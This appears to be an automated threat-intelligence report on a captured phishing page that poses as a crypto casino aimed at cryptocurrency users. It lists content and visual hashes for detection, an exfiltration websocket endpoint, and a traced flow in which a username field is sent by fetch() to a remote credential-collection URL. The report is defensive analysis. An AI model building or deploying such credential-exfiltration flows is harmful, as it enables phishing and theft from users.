Detailed analysis of captured phishing page
Used to detect similar phishing pages based on HTML content
| Algorithm | Hash Value |
|---|---|
|
CONTENT
TLSH
|
T1EC7418BFA72802B9E105C7DCC952A035316E24FE3B6186E4F7198F36B118CDD9869D93 |
|
CONTENT
ssdeep
|
1536:PfF+6yc9BoUpQ5rTADK7awVJA4E11gXqFM3UBWXc9BoUpQ5AWtGPOWIbZtieY579:Pec9HQqeVJA4E118c9HQwPyOV8cE6 |
Used to detect visually similar phishing pages based on screenshots
| Algorithm | Hash Value |
|---|---|
|
VISUAL
pHash
|
939939e6a66c6c85 |
|
VISUAL
aHash
|
162c3c043e3c2c3c |
|
VISUAL
dHash
|
e4d9d0c4e4c4d8dc |
|
VISUAL
wHash
|
163c7c347e3c2c3c |
|
VISUAL
colorHash
|
30003600000 |
|
VISUAL
cropResistant
|
e4d9d0c4e4c4d8dc |
โข Threat: Phishing
โข Target: Cryptocurrency users
โข Method: Impersonation and Social Engineering
โข Exfil: wss://gambler-work.com/api/ws
โข Indicators: Recent domain, JS obfuscation, Celebrity endorsements, Crypto Offering.
โข Risk: High
The site tries to look legitimate through the use of imagery and celebrity endorsements, and claims it is a crypto casino. The ultimate goal is to get the user to input personal information or provide crypto
Javascript obfuscation hides malicious functionality. The site likely aims to steal data from a potential victim's browser.
User fills <input name='username'> โ submitForm() โ fetch('https://failax.com/api/submit_credentials') โ credentials sent to remote server
User fills <input name='username'> โ submitForm() โ fetch('https://failax.com/api/submit_credentials') โ credentials sent to remote server
main-app-fef4a8898ec7782a.jssubmitForm()Pages with identical visual appearance (based on perceptual hash)